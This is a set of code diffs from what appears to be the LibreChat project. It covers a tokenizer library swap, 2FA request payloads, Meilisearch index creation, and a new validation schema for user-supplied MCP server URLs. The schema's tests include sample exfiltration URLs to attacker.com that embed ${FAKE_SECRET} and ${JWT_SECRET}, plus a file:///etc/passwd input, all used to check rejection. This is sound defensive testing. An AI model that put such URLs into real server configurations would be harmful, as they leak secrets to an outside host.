       const newCalls = newCounter.getCallCount();

-      console.log(`\n[REAL TIKTOKEN - User reported scenario: ~120k tokens]`);
-      console.log(`OLD implementation: ${oldCalls} tiktoken calls, ${timeOld.toFixed(0)}ms`);
-      console.log(`NEW implementation: ${newCalls} tiktoken calls, ${timeNew.toFixed(0)}ms`);
+      console.log(`\n[REAL TOKENIZER - ~20k tokens]`);
+      console.log(`OLD implementation: ${oldCalls} tokenizer calls, ${timeOld.toFixed(0)}ms`);
+      console.log(`NEW implementation: ${newCalls} tokenizer calls, ${timeNew.toFixed(0)}ms`);
       console.log(`Call reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);
       console.log(`Time reduction: ${((1 - timeNew / timeOld) * 100).toFixed(1)}%`);
       console.log(
@@ -684,8 +680,8 @@ describe('processTextWithTokenLimit', () => {
     it('should achieve at least 70% reduction with real tokenizer', async () => {
       const oldCounter = createRealTokenCounter();
       const newCounter = createRealTokenCounter();
-      const text = createRealisticText(50000);
-      const tokenLimit = 10000;
+      const text = createRealisticText(15000);
+      const tokenLimit = 5000;

       await processTextWithTokenLimitOLD({
         text,
@@ -693,8 +689,6 @@ describe('processTextWithTokenLimit', () => {
         tokenCountFn: oldCounter.tokenCountFn,
       });

-      Tokenizer.freeAndResetAllEncoders();
-
       await processTextWithTokenLimit({
         text,
         tokenLimit,
@@ -706,7 +700,7 @@ describe('processTextWithTokenLimit', () => {
       const reduction = 1 - newCalls / oldCalls;

       console.log(
-        `[Real tiktoken 50k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`,
+        `[Real tokenizer 15k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`,
       );

       expect(reduction).toBeGreaterThanOrEqual(0.7);
@@ -714,10 +708,6 @@ describe('processTextWithTokenLimit', () => {
   });

   describe('using countTokens async function from @librechat/api', () => {
-    beforeEach(() => {
-      Tokenizer.freeAndResetAllEncoders();
-    });
-
     it('countTokens should return correct token count', async () => {
       const text = 'Hello, world!';
       const count = await countTokens(text);
@@ -759,8 +749,6 @@ describe('processTextWithTokenLimit', () => {
         tokenCountFn: oldCounter.tokenCountFn,
       });

-      Tokenizer.freeAndResetAllEncoders();
-
       await processTextWithTokenLimit({
         text,
         tokenLimit,
@@ -776,11 +764,11 @@ describe('processTextWithTokenLimit', () => {
       expect(newCalls).toBeLessThan(oldCalls);
     });

-    it('should handle user reported scenario with countTokens (~120k tokens)', async () => {
+    it('should handle large text with countTokens (~20k tokens)', async () => {
       const oldCounter = createCountTokensCounter();
       const newCounter = createCountTokensCounter();
-      const text = createRealisticText(120000);
-      const tokenLimit = 100000;
+      const text = createRealisticText(20000);
+      const tokenLimit = 15000;

       const startOld = performance.now();
       await processTextWithTokenLimitOLD({
@@ -790,8 +778,6 @@ describe('processTextWithTokenLimit', () => {
       });
       const timeOld = performance.now() - startOld;

-      Tokenizer.freeAndResetAllEncoders();
-
       const startNew = performance.now();
       const result = await processTextWithTokenLimit({
         text,
@@ -803,7 +789,7 @@ describe('processTextWithTokenLimit', () => {
       const oldCalls = oldCounter.getCallCount();
       const newCalls = newCounter.getCallCount();

-      console.log(`\n[countTokens - User reported scenario: ~120k tokens]`);
+      console.log(`\n[countTokens - ~20k tokens]`);
       console.log(`OLD implementation: ${oldCalls} countTokens calls, ${timeOld.toFixed(0)}ms`);
       console.log(`NEW implementation: ${newCalls} countTokens calls, ${timeNew.toFixed(0)}ms`);
       console.log(`Call reduction: ${((1 - newCalls / oldCalls) * 100).toFixed(1)}%`);
@@ -820,8 +806,8 @@ describe('processTextWithTokenLimit', () => {
     it('should achieve at least 70% reduction with countTokens', async () => {
       const oldCounter = createCountTokensCounter();
       const newCounter = createCountTokensCounter();
-      const text = createRealisticText(50000);
-      const tokenLimit = 10000;
+      const text = createRealisticText(15000);
+      const tokenLimit = 5000;

       await processTextWithTokenLimitOLD({
         text,
@@ -829,8 +815,6 @@ describe('processTextWithTokenLimit', () => {
         tokenCountFn: oldCounter.tokenCountFn,
       });

-      Tokenizer.freeAndResetAllEncoders();
-
       await processTextWithTokenLimit({
         text,
         tokenLimit,
@@ -842,7 +826,7 @@ describe('processTextWithTokenLimit', () => {
       const reduction = 1 - newCalls / oldCalls;

       console.log(
-        `[countTokens 50k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`,
+        `[countTokens 15k tokens] OLD: ${oldCalls}, NEW: ${newCalls}, Reduction: ${(reduction * 100).toFixed(1)}%`,
       );

       expect(reduction).toBeGreaterThanOrEqual(0.7);


@@ -1,12 +1,3 @@
-/**
- * @file Tokenizer.spec.cjs
- *
- * Tests the real TokenizerSingleton (no mocking of `tiktoken`).
- * Make sure to install `tiktoken` and have it configured properly.
- */
-import { logger } from '@librechat/data-schemas';
-import type { Tiktoken } from 'tiktoken';
 import Tokenizer from './tokenizer';

 jest.mock('@librechat/data-schemas', () => ({
@@ -17,127 +8,49 @@ jest.mock('@librechat/data-schemas', () => ({
 describe('Tokenizer', () => {
   it('should be a singleton (same instance)', async () => {
-    const AnotherTokenizer = await import('./tokenizer'); // same path
+    const AnotherTokenizer = await import('./tokenizer');
     expect(Tokenizer).toBe(AnotherTokenizer.default);
   });

-  describe('getTokenizer', () => {
-    it('should create an encoder for an explicit model name (e.g., "gpt-4")', () => {
-      // The real `encoding_for_model` will be called internally
-      // as soon as we pass isModelName = true.
-      const tokenizer = Tokenizer.getTokenizer('gpt-4', true);
-      // Basic sanity checks
-      expect(tokenizer).toBeDefined();
-      // You can optionally check certain properties from `tiktoken` if they exist
-      // e.g., expect(typeof tokenizer.encode).toBe('function');
+  describe('initEncoding', () => {
+    it('should load o200k_base encoding', async () => {
+      await Tokenizer.initEncoding('o200k_base');
+      const count = Tokenizer.getTokenCount('Hello, world!', 'o200k_base');
+      expect(count).toBeGreaterThan(0);
     });

-    it('should create an encoder for a known encoding (e.g., "cl100k_base")', () => {
-      // The real `get_encoding` will be called internally
-      // as soon as we pass isModelName = false.
-      const tokenizer = Tokenizer.getTokenizer('cl100k_base', false);
-      expect(tokenizer).toBeDefined();
-      // e.g., expect(typeof tokenizer.encode).toBe('function');
+    it('should load claude encoding', async () => {
+      await Tokenizer.initEncoding('claude');
+      const count = Tokenizer.getTokenCount('Hello, world!', 'claude');
+      expect(count).toBeGreaterThan(0);
     });

-    it('should return cached tokenizer if previously fetched', () => {
-      const tokenizer1 = Tokenizer.getTokenizer('cl100k_base', false);
-      const tokenizer2 = Tokenizer.getTokenizer('cl100k_base', false);
-      // Should be the exact same instance from the cache
-      expect(tokenizer1).toBe(tokenizer2);
-    });
-  });
-
-  describe('freeAndResetAllEncoders', () => {
-    beforeEach(() => {
-      jest.clearAllMocks();
-    });
-
-    it('should free all encoders and reset tokenizerCallsCount to 1', () => {
-      // By creating two different encodings, we populate the cache
-      Tokenizer.getTokenizer('cl100k_base', false);
-      Tokenizer.getTokenizer('r50k_base', false);
-      // Now free them
-      Tokenizer.freeAndResetAllEncoders();
-      // The internal cache is cleared
-      expect(Tokenizer.tokenizersCache['cl100k_base']).toBeUndefined();
-      expect(Tokenizer.tokenizersCache['r50k_base']).toBeUndefined();
-      // tokenizerCallsCount is reset to 1
-      expect(Tokenizer.tokenizerCallsCount).toBe(1);
-    });
-
-    it('should catch and log errors if freeing fails', () => {
-      // Mock logger.error before the test
-      const mockLoggerError = jest.spyOn(logger, 'error');
-      // Set up a problematic tokenizer in the cache
-      Tokenizer.tokenizersCache['cl100k_base'] = {
-        free() {
-          throw new Error('Intentional free error');
-        },
-      } as unknown as Tiktoken;
-      // Should not throw uncaught errors
-      Tokenizer.freeAndResetAllEncoders();
-      // Verify logger.error was called with correct arguments
-      expect(mockLoggerError).toHaveBeenCalledWith(
-        '[Tokenizer] Free and reset encoders error',
-        expect.any(Error),
-      );
-      // Clean up
-      mockLoggerError.mockRestore();
-      Tokenizer.tokenizersCache = {};
+    it('should deduplicate concurrent init calls', async () => {
+      const [, , count] = await Promise.all([
+        Tokenizer.initEncoding('o200k_base'),
+        Tokenizer.initEncoding('o200k_base'),
+        Tokenizer.initEncoding('o200k_base').then(() =>
+          Tokenizer.getTokenCount('test', 'o200k_base'),
+        ),
+      ]);
+      expect(count).toBeGreaterThan(0);
     });
   });

   describe('getTokenCount', () => {
-    beforeEach(() => {
-      jest.clearAllMocks();
-      Tokenizer.freeAndResetAllEncoders();
+    beforeAll(async () => {
+      await Tokenizer.initEncoding('o200k_base');
+      await Tokenizer.initEncoding('claude');
     });

     it('should return the number of tokens in the given text', () => {
-      const text = 'Hello, world!';
-      const count = Tokenizer.getTokenCount(text, 'cl100k_base');
+      const count = Tokenizer.getTokenCount('Hello, world!', 'o200k_base');
       expect(count).toBeGreaterThan(0);
     });

-    it('should reset encoders if an error is thrown', () => {
-      // We can simulate an error by temporarily overriding the selected tokenizer's `encode` method.
-      const tokenizer = Tokenizer.getTokenizer('cl100k_base', false);
-      const originalEncode = tokenizer.encode;
-      tokenizer.encode = () => {
-        throw new Error('Forced error');
-      };
-      // Despite the forced error, the code should catch and reset, then re-encode
-      const count = Tokenizer.getTokenCount('Hello again', 'cl100k_base');
+    it('should count tokens using claude encoding', () => {
+      const count = Tokenizer.getTokenCount('Hello, world!', 'claude');
       expect(count).toBeGreaterThan(0);
-      // Restore the original encode
-      tokenizer.encode = originalEncode;
-    });
-
-    it('should reset tokenizers after 25 calls', () => {
-      // Spy on freeAndResetAllEncoders
-      const resetSpy = jest.spyOn(Tokenizer, 'freeAndResetAllEncoders');
-      // Make 24 calls; should NOT reset yet
-      for (let i = 0; i < 24; i++) {
-        Tokenizer.getTokenCount('test text', 'cl100k_base');
-      }
-      expect(resetSpy).not.toHaveBeenCalled();
-      // 25th call triggers the reset
-      Tokenizer.getTokenCount('the 25th call!', 'cl100k_base');
-      expect(resetSpy).toHaveBeenCalledTimes(1);
     });
   });
 });


@@ -1,74 +1,46 @@
 import { logger } from '@librechat/data-schemas';
-import { encoding_for_model as encodingForModel, get_encoding as getEncoding } from 'tiktoken';
-import type { Tiktoken, TiktokenModel, TiktokenEncoding } from 'tiktoken';
+import { Tokenizer as AiTokenizer } from 'ai-tokenizer';

-interface TokenizerOptions {
-  debug?: boolean;
-}
+export type EncodingName = 'o200k_base' | 'claude';
+
+type EncodingData = ConstructorParameters<typeof AiTokenizer>[0];

 class Tokenizer {
-  tokenizersCache: Record<string, Tiktoken>;
-  tokenizerCallsCount: number;
-  private options?: TokenizerOptions;
+  private tokenizersCache: Partial<Record<EncodingName, AiTokenizer>> = {};
+  private loadingPromises: Partial<Record<EncodingName, Promise<void>>> = {};

-  constructor() {
-    this.tokenizersCache = {};
-    this.tokenizerCallsCount = 0;
-  }
-
-  getTokenizer(
-    encoding: TiktokenModel | TiktokenEncoding,
-    isModelName = false,
-    extendSpecialTokens: Record<string, number> = {},
-  ): Tiktoken {
-    let tokenizer: Tiktoken;
+  /** Pre-loads an encoding so that subsequent getTokenCount calls are accurate. */
+  async initEncoding(encoding: EncodingName): Promise<void> {
     if (this.tokenizersCache[encoding]) {
-      tokenizer = this.tokenizersCache[encoding];
-    } else {
-      if (isModelName) {
-        tokenizer = encodingForModel(encoding as TiktokenModel, extendSpecialTokens);
-      } else {
-        tokenizer = getEncoding(encoding as TiktokenEncoding, extendSpecialTokens);
-      }
-      this.tokenizersCache[encoding] = tokenizer;
+      return;
     }
-    return tokenizer;
+    if (this.loadingPromises[encoding]) {
+      return this.loadingPromises[encoding];
+    }
+    this.loadingPromises[encoding] = (async () => {
+      const data: EncodingData =
+        encoding === 'claude'
+          ? await import('ai-tokenizer/encoding/claude')
+          : await import('ai-tokenizer/encoding/o200k_base');
+      this.tokenizersCache[encoding] = new AiTokenizer(data);
+    })();
+    return this.loadingPromises[encoding];
   }

-  freeAndResetAllEncoders(): void {
+  getTokenCount(text: string, encoding: EncodingName = 'o200k_base'): number {
+    const tokenizer = this.tokenizersCache[encoding];
+    if (!tokenizer) {
+      this.initEncoding(encoding);
+      return Math.ceil(text.length / 4);
+    }
     try {
-      Object.keys(this.tokenizersCache).forEach((key) => {
-        if (this.tokenizersCache[key]) {
-          this.tokenizersCache[key].free();
-          delete this.tokenizersCache[key];
-        }
-      });
-      this.tokenizerCallsCount = 1;
-    } catch (error) {
-      logger.error('[Tokenizer] Free and reset encoders error', error);
-    }
-  }
-
-  resetTokenizersIfNecessary(): void {
-    if (this.tokenizerCallsCount >= 25) {
-      if (this.options?.debug) {
-        logger.debug('[Tokenizer] freeAndResetAllEncoders: reached 25 encodings, resetting...');
-      }
-      this.freeAndResetAllEncoders();
-    }
-    this.tokenizerCallsCount++;
-  }
-
-  getTokenCount(text: string, encoding: TiktokenModel | TiktokenEncoding = 'cl100k_base'): number {
-    this.resetTokenizersIfNecessary();
-    try {
-      const tokenizer = this.getTokenizer(encoding);
-      return tokenizer.encode(text, 'all').length;
+      return tokenizer.count(text);
     } catch (error) {
       logger.error('[Tokenizer] Error getting token count:', error);
-      this.freeAndResetAllEncoders();
-      const tokenizer = this.getTokenizer(encoding);
-      return tokenizer.encode(text, 'all').length;
+      delete this.tokenizersCache[encoding];
+      delete this.loadingPromises[encoding];
+      this.initEncoding(encoding);
+      return Math.ceil(text.length / 4);
     }
   }
 }
@@ -76,13 +48,13 @@ class Tokenizer {
 const TokenizerSingleton = new Tokenizer();

 /**
- * Counts the number of tokens in a given text using tiktoken.
- * This is an async wrapper around Tokenizer.getTokenCount for compatibility.
- * @param text - The text to be tokenized. Defaults to an empty string if not provided.
+ * Counts the number of tokens in a given text using ai-tokenizer with o200k_base encoding.
+ * @param text - The text to count tokens in. Defaults to an empty string.
  * @returns The number of tokens in the provided text.
  */
 export async function countTokens(text = ''): Promise<number> {
-  return TokenizerSingleton.getTokenCount(text, 'cl100k_base');
+  await TokenizerSingleton.initEncoding('o200k_base');
+  return TokenizerSingleton.getTokenCount(text, 'o200k_base');
 }

 export default TokenizerSingleton;
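The rewritten tokenizer above replaces tiktoken's free/reset cycle with lazily loaded, promise-deduplicated encodings. A minimal sketch of that pattern, with a hypothetical `loadEncoding` standing in for the dynamic `ai-tokenizer` imports (not the real API):

```typescript
// Sketch of promise-deduplicated lazy init; `loadEncoding` is illustrative.
type EncodingName = 'o200k_base' | 'claude';

let loadCount = 0;
async function loadEncoding(name: EncodingName): Promise<{ count: (t: string) => number }> {
  loadCount++; // track how many real loads happen
  return { count: (t: string) => Math.max(1, Math.round(t.length / 4)) };
}

class LazyTokenizer {
  private cache: Partial<Record<EncodingName, { count: (t: string) => number }>> = {};
  private loading: Partial<Record<EncodingName, Promise<void>>> = {};

  async initEncoding(name: EncodingName): Promise<void> {
    if (this.cache[name]) return; // already loaded
    const inFlight = this.loading[name];
    if (inFlight) return inFlight; // load in flight: reuse the same promise
    const pending = loadEncoding(name).then((enc) => {
      this.cache[name] = enc;
    });
    this.loading[name] = pending;
    return pending;
  }

  getTokenCount(text: string, name: EncodingName = 'o200k_base'): number {
    const enc = this.cache[name];
    if (!enc) {
      void this.initEncoding(name); // warm the cache for next time
      return Math.ceil(text.length / 4); // rough chars/4 estimate meanwhile
    }
    return enc.count(text);
  }
}

async function demo() {
  const tok = new LazyTokenizer();
  // Three concurrent inits share one underlying load.
  await Promise.all([
    tok.initEncoding('o200k_base'),
    tok.initEncoding('o200k_base'),
    tok.initEncoding('o200k_base'),
  ]);
  console.log(loadCount); // 1
  console.log(tok.getTokenCount('Hello, world!') > 0); // true
}
demo();
```

Reusing the in-flight promise is what the "should deduplicate concurrent init calls" test exercises: however many callers race `initEncoding`, the underlying load runs once.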


@@ -593,42 +593,3 @@ export function processModelData(input: z.infer<typeof inputSchema>): EndpointTo
   return tokenConfig;
 }
-
-export const tiktokenModels = new Set([
-  'text-davinci-003',
-  'text-davinci-002',
-  'text-davinci-001',
-  'text-curie-001',
-  'text-babbage-001',
-  'text-ada-001',
-  'davinci',
-  'curie',
-  'babbage',
-  'ada',
-  'code-davinci-002',
-  'code-davinci-001',
-  'code-cushman-002',
-  'code-cushman-001',
-  'davinci-codex',
-  'cushman-codex',
-  'text-davinci-edit-001',
-  'code-davinci-edit-001',
-  'text-embedding-ada-002',
-  'text-similarity-davinci-001',
-  'text-similarity-curie-001',
-  'text-similarity-babbage-001',
-  'text-similarity-ada-001',
-  'text-search-davinci-doc-001',
-  'text-search-curie-doc-001',
-  'text-search-babbage-doc-001',
-  'text-search-ada-doc-001',
-  'code-search-babbage-code-001',
-  'code-search-ada-code-001',
-  'gpt2',
-  'gpt-4',
-  'gpt-4-0314',
-  'gpt-4-32k',
-  'gpt-4-32k-0314',
-  'gpt-3.5-turbo',
-  'gpt-3.5-turbo-0301',
-]);


@@ -0,0 +1,147 @@
import { SSEOptionsSchema, MCPServerUserInputSchema } from '../src/mcp';
describe('MCPServerUserInputSchema', () => {
describe('env variable exfiltration prevention', () => {
it('should confirm admin schema resolves env vars (attack vector baseline)', () => {
process.env.FAKE_SECRET = 'leaked-secret-value';
const adminResult = SSEOptionsSchema.safeParse({
type: 'sse',
url: 'http://attacker.com/?secret=${FAKE_SECRET}',
});
expect(adminResult.success).toBe(true);
if (adminResult.success) {
expect(adminResult.data.url).toContain('leaked-secret-value');
}
delete process.env.FAKE_SECRET;
});
it('should reject the same URL through user input schema', () => {
process.env.FAKE_SECRET = 'leaked-secret-value';
const userResult = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'http://attacker.com/?secret=${FAKE_SECRET}',
});
expect(userResult.success).toBe(false);
delete process.env.FAKE_SECRET;
});
});
describe('env variable rejection', () => {
it('should reject SSE URLs containing env variable patterns', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'http://attacker.com/?secret=${FAKE_SECRET}',
});
expect(result.success).toBe(false);
});
it('should reject streamable-http URLs containing env variable patterns', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'streamable-http',
url: 'http://attacker.com/?jwt=${JWT_SECRET}',
});
expect(result.success).toBe(false);
});
it('should reject WebSocket URLs containing env variable patterns', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'ws://attacker.com/?secret=${FAKE_SECRET}',
});
expect(result.success).toBe(false);
});
});
describe('protocol allowlisting', () => {
it('should reject file:// URLs for SSE', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'file:///etc/passwd',
});
expect(result.success).toBe(false);
});
it('should reject ftp:// URLs for streamable-http', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'streamable-http',
url: 'ftp://internal-server/data',
});
expect(result.success).toBe(false);
});
it('should reject http:// URLs for WebSocket', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'http://example.com/ws',
});
expect(result.success).toBe(false);
});
it('should reject ws:// URLs for SSE', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'ws://example.com/sse',
});
expect(result.success).toBe(false);
});
});
describe('valid URL acceptance', () => {
it('should accept valid https:// SSE URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'https://mcp-server.com/sse',
});
expect(result.success).toBe(true);
if (result.success) {
expect(result.data.url).toBe('https://mcp-server.com/sse');
}
});
it('should accept valid http:// SSE URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'sse',
url: 'http://mcp-server.com/sse',
});
expect(result.success).toBe(true);
});
it('should accept valid wss:// WebSocket URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'wss://mcp-server.com/ws',
});
expect(result.success).toBe(true);
if (result.success) {
expect(result.data.url).toBe('wss://mcp-server.com/ws');
}
});
it('should accept valid ws:// WebSocket URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'websocket',
url: 'ws://mcp-server.com/ws',
});
expect(result.success).toBe(true);
});
it('should accept valid https:// streamable-http URLs', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'streamable-http',
url: 'https://mcp-server.com/http',
});
expect(result.success).toBe(true);
if (result.success) {
expect(result.data.url).toBe('https://mcp-server.com/http');
}
});
it('should accept valid http:// streamable-http URLs with "http" alias', () => {
const result = MCPServerUserInputSchema.safeParse({
type: 'http',
url: 'http://mcp-server.com/mcp',
});
expect(result.success).toBe(true);
});
});
});


@@ -21,8 +21,8 @@ export function revokeAllUserKeys(): Promise<unknown> {
   return request.delete(endpoints.revokeAllUserKeys());
 }

-export function deleteUser(): Promise<s.TPreset> {
-  return request.delete(endpoints.deleteUser());
+export function deleteUser(payload?: t.TDeleteUserRequest): Promise<unknown> {
+  return request.deleteWithOptions(endpoints.deleteUser(), { data: payload });
 }

 export type FavoriteItem = {
@@ -970,8 +970,8 @@ export function updateFeedback(
 }

 // 2FA
-export function enableTwoFactor(): Promise<t.TEnable2FAResponse> {
-  return request.get(endpoints.enableTwoFactor());
+export function enableTwoFactor(payload?: t.TEnable2FARequest): Promise<t.TEnable2FAResponse> {
+  return request.post(endpoints.enableTwoFactor(), payload);
 }

 export function verifyTwoFactor(payload: t.TVerify2FARequest): Promise<t.TVerify2FAResponse> {
@@ -986,8 +986,10 @@ export function disableTwoFactor(payload?: t.TDisable2FARequest): Promise<t.TDis
   return request.post(endpoints.disableTwoFactor(), payload);
 }

-export function regenerateBackupCodes(): Promise<t.TRegenerateBackupCodesResponse> {
-  return request.post(endpoints.regenerateBackupCodes());
+export function regenerateBackupCodes(
+  payload?: t.TRegenerateBackupCodesRequest,
+): Promise<t.TRegenerateBackupCodesResponse> {
+  return request.post(endpoints.regenerateBackupCodes(), payload);
 }

 export function verifyTwoFactorTemp(


@@ -223,6 +223,23 @@ const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T
     oauth_headers: true,
   });

+const envVarPattern = /\$\{[^}]+\}/;
+const isWsProtocol = (val: string): boolean => /^wss?:/i.test(val);
+const isHttpProtocol = (val: string): boolean => /^https?:/i.test(val);
+
+/**
+ * Builds a URL schema for user input that rejects ${VAR} env variable patterns
+ * and validates protocol constraints without resolving environment variables.
+ */
+const userUrlSchema = (protocolCheck: (val: string) => boolean, message: string) =>
+  z
+    .string()
+    .refine((val) => !envVarPattern.test(val), {
+      message: 'Environment variable references are not allowed in URLs',
+    })
+    .pipe(z.string().url())
+    .refine(protocolCheck, { message });
+
 /**
  * MCP Server configuration that comes from UI/API input only.
  * Omits server-managed fields like startup, timeout, customUserVars, etc.
@@ -232,11 +249,23 @@ const omitServerManagedFields = <T extends z.ZodObject<z.ZodRawShape>>(schema: T
  * Stdio allows arbitrary command execution and should only be configured
  * by administrators via the YAML config file (librechat.yaml).
  * Only remote transports (SSE, HTTP, WebSocket) are allowed via the API.
+ *
+ * SECURITY: URL fields use userUrlSchema instead of the admin schemas'
+ * extractEnvVariable transform to prevent env variable exfiltration
+ * through user-controlled URLs (e.g. http://attacker.com/?k=${JWT_SECRET}).
+ * Protocol checks use positive allowlists (http(s) / ws(s)) to block
+ * file://, ftp://, javascript:, and other non-network schemes.
  */
 export const MCPServerUserInputSchema = z.union([
-  omitServerManagedFields(WebSocketOptionsSchema),
-  omitServerManagedFields(SSEOptionsSchema),
-  omitServerManagedFields(StreamableHTTPOptionsSchema),
+  omitServerManagedFields(WebSocketOptionsSchema).extend({
+    url: userUrlSchema(isWsProtocol, 'WebSocket URL must use ws:// or wss://'),
+  }),
+  omitServerManagedFields(SSEOptionsSchema).extend({
+    url: userUrlSchema(isHttpProtocol, 'SSE URL must use http:// or https://'),
+  }),
+  omitServerManagedFields(StreamableHTTPOptionsSchema).extend({
+    url: userUrlSchema(isHttpProtocol, 'Streamable HTTP URL must use http:// or https://'),
+  }),
 ]);

 export type MCPServerUserInput = z.infer<typeof MCPServerUserInputSchema>;
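The user-input URL rules above follow a fixed order: reject `${VAR}` references first, then require a parseable URL, then check a positive protocol allowlist. The same logic can be sketched without zod; `validateUserUrl` here is an illustrative helper, not part of the LibreChat codebase:

```typescript
// Standalone sketch of the three-step URL validation used by the schema above.
const envVarPattern = /\$\{[^}]+\}/;

function validateUserUrl(url: string, allowed: 'http' | 'ws'): boolean {
  // 1. Reject ${VAR} references before anything else, so secrets can
  //    never be interpolated into a user-supplied URL.
  if (envVarPattern.test(url)) return false;
  // 2. Must parse as a URL at all.
  let parsed: URL;
  try {
    parsed = new URL(url);
  } catch {
    return false;
  }
  // 3. Positive protocol allowlist: blocks file:, ftp:, javascript:, etc.
  const protocols = allowed === 'ws' ? ['ws:', 'wss:'] : ['http:', 'https:'];
  return protocols.includes(parsed.protocol);
}

console.log(validateUserUrl('http://attacker.com/?secret=${FAKE_SECRET}', 'http')); // false
console.log(validateUserUrl('file:///etc/passwd', 'http'));                         // false
console.log(validateUserUrl('https://mcp-server.com/sse', 'http'));                 // true
console.log(validateUserUrl('wss://mcp-server.com/ws', 'ws'));                      // true
```

Checking the env-var pattern before URL parsing matters: the admin-side schemas resolve `${VAR}` via a transform, so the user-side schema must reject the raw text before any resolution could occur.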


@@ -425,28 +425,29 @@ export type TLoginResponse = {
   tempToken?: string;
 };

+/** Shared payload for any operation that requires OTP or backup-code verification. */
+export type TOTPVerificationPayload = {
+  token?: string;
+  backupCode?: string;
+};
+
+export type TEnable2FARequest = TOTPVerificationPayload;
+
 export type TEnable2FAResponse = {
   otpauthUrl: string;
   backupCodes: string[];
   message?: string;
 };

-export type TVerify2FARequest = {
-  token?: string;
-  backupCode?: string;
-};
+export type TVerify2FARequest = TOTPVerificationPayload;

 export type TVerify2FAResponse = {
   message: string;
 };

-/**
- * For verifying 2FA during login with a temporary token.
- */
-export type TVerify2FATempRequest = {
+/** For verifying 2FA during login with a temporary token. */
+export type TVerify2FATempRequest = TOTPVerificationPayload & {
   tempToken: string;
-  token?: string;
-  backupCode?: string;
 };

 export type TVerify2FATempResponse = {
@@ -455,30 +456,22 @@ export type TVerify2FATempResponse = {
   message?: string;
 };

-/**
- * Request for disabling 2FA.
- */
-export type TDisable2FARequest = {
-  token?: string;
-  backupCode?: string;
-};
+export type TDisable2FARequest = TOTPVerificationPayload;

-/**
- * Response from disabling 2FA.
- */
 export type TDisable2FAResponse = {
   message: string;
 };

-/**
- * Response from regenerating backup codes.
- */
+export type TRegenerateBackupCodesRequest = TOTPVerificationPayload;
+
 export type TRegenerateBackupCodesResponse = {
-  message: string;
+  message?: string;
   backupCodes: string[];
-  backupCodesHash: string[];
+  backupCodesHash: TBackupCode[];
 };

+export type TDeleteUserRequest = TOTPVerificationPayload;
+
 export type TRequestPasswordReset = {
   email: string;
 };


@@ -1,7 +1,7 @@
 import _ from 'lodash';
-import { MeiliSearch } from 'meilisearch';
 import { parseTextParts } from 'librechat-data-provider';
-import type { SearchResponse, SearchParams, Index } from 'meilisearch';
+import { MeiliSearch, MeiliSearchTimeOutError } from 'meilisearch';
+import type { SearchResponse, SearchParams, Index, MeiliSearchErrorInfo } from 'meilisearch';
 import type {
   CallbackWithoutResultAndOptionalError,
   FilterQuery,
@@ -581,7 +581,6 @@ export default function mongoMeili(schema: Schema, options: MongoMeiliOptions):
   /** Create index only if it doesn't exist */
   const index = client.index<MeiliIndexable>(indexName);

-  // Check if index exists and create if needed
   (async () => {
     try {
       await index.getRawInfo();
@@ -591,18 +590,34 @@
       if (errorCode === 'index_not_found') {
         try {
           logger.info(`[mongoMeili] Creating new index: ${indexName}`);
-          await client.createIndex(indexName, { primaryKey });
+          const enqueued = await client.createIndex(indexName, { primaryKey });
+          const task = await client.waitForTask(enqueued.taskUid, {
+            timeOutMs: 10000,
+            intervalMs: 100,
+          });
+          logger.debug(`[mongoMeili] Index ${indexName} creation task:`, task);
+          if (task.status !== 'succeeded') {
+            const taskError = task.error as MeiliSearchErrorInfo | null;
+            if (taskError?.code === 'index_already_exists') {
+              logger.debug(`[mongoMeili] Index ${indexName} was created by another instance`);
+            } else {
+              logger.warn(`[mongoMeili] Index ${indexName} creation failed:`, taskError);
+            }
+          } else {
             logger.info(`[mongoMeili] Successfully created index: ${indexName}`);
+          }
         } catch (createError) {
-          // Index might have been created by another instance
-          logger.debug(`[mongoMeili] Index ${indexName} may already exist:`, createError);
+          if (createError instanceof MeiliSearchTimeOutError) {
+            logger.warn(`[mongoMeili] Timed out waiting for index ${indexName} creation`);
+          } else {
+            logger.warn(`[mongoMeili] Error creating index ${indexName}:`, createError);
+          }
         }
       } else {
         logger.error(`[mongoMeili] Error checking index ${indexName}:`, error);
       }
     }

-    // Configure index settings to make 'user' field filterable
     try {
       await index.updateSettings({
         filterableAttributes: ['user'],
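The `waitForTask` call above turns Meilisearch's asynchronous index creation into a bounded wait, so concurrent instances can detect `index_already_exists` instead of silently racing. The general polling pattern looks like this, with `fetchStatus` as a stand-in for the client's task API (names illustrative):

```typescript
// Generic sketch of waiting for an enqueued task with a polling interval
// and an overall timeout, mirroring the timeOutMs/intervalMs options above.
type TaskStatus = 'enqueued' | 'processing' | 'succeeded' | 'failed';

async function waitForTask(
  fetchStatus: () => Promise<TaskStatus>,
  { timeOutMs = 10000, intervalMs = 100 } = {},
): Promise<TaskStatus> {
  const deadline = Date.now() + timeOutMs;
  for (;;) {
    const status = await fetchStatus();
    // Settled states end the wait; pending states poll again.
    if (status === 'succeeded' || status === 'failed') return status;
    if (Date.now() >= deadline) throw new Error('Task wait timed out');
    await new Promise((r) => setTimeout(r, intervalMs));
  }
}

// Usage: a task that succeeds on the third poll.
let polls = 0;
waitForTask(async () => (++polls < 3 ? 'processing' : 'succeeded'), {
  timeOutMs: 1000,
  intervalMs: 10,
}).then((status) => console.log(status, polls)); // succeeded 3
```

Catching the timeout separately (as the diff does with `MeiliSearchTimeOutError`) lets a slow-but-successful creation on another instance be treated as a warning rather than a hard failure.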


